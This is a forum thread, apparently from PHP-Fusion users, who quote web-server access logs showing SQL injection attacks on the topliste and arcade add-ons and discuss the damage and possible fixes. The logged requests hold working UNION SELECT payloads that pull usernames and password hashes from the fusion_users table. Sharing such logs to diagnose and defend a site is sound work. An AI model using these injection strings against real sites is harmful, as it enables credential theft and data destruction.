Quote
m_a_f wrote:
85.105.216.170 - - [02/Apr/2007:19:31:11 +0300] "GET /images/photoalbum/album_5/img_0198_t1.jpg HTTP/1.1" 200 2746 "http://www.my_site/infusions/topliste/index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/*" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
Quote
lamborgini8 wrote:Quote
m_a_f wrote:
85.105.216.170 - - [02/Apr/2007:19:31:11 +0300] "GET /images/photoalbum/album_5/img_0198_t1.jpg HTTP/1.1" 200 2746 "http://www.my_site/infusions/topliste/index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/*" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
Whats this? and why would the topsites be a problem?
Quote
Tiido wrote:
87.101.240.9 - - [03/Apr/2007:13:59:22 +0300] "GET /bf/infusions/arcade/index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/* HTTP/1.1" 200 171 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
its from acces_log
"they" got my database deleted ...
Quote
uctxs wrote:
lol .... BloodKiller, are you going to explain how to fix these exploits your finding.
Quote
Forseti wrote:
Bloodkiller: Could you explain how changing the names of tables would protect you from this Exploit?
Using mysql as of version 5.0.2 its REALLY easy to retrieve the tablenames, just alter the above request a bit and your on your way to hacker heaven again..:(
I will not post here how to do it (using php-fusion my self and i don't want these kind of things floating around in public..).
Just recently had my site hacked by the Arcade crap.. Also found out that calendar_panel has the same problem, good damn who makes these crapy pieces of software???:@
Quote
StarglowOne wrote:Quote
Forseti wrote:
Bloodkiller: Could you explain how changing the names of tables would protect you from this Exploit?
Using mysql as of version 5.0.2 its REALLY easy to retrieve the tablenames, just alter the above request a bit and your on your way to hacker heaven again..:(
I will not post here how to do it (using php-fusion my self and i don't want these kind of things floating around in public..).
Just recently had my site hacked by the Arcade crap.. Also found out that calendar_panel has the same problem, good damn who makes these crapy pieces of software???:@
if the arcade is so crappy, why use it? Its your choice, we havent told you t use it.
Category Forum
Bugs and Errors - 6Labels
None yet
Statistics
0 participants
Notifications
You are not receiving notifications from this thread.
Related Questions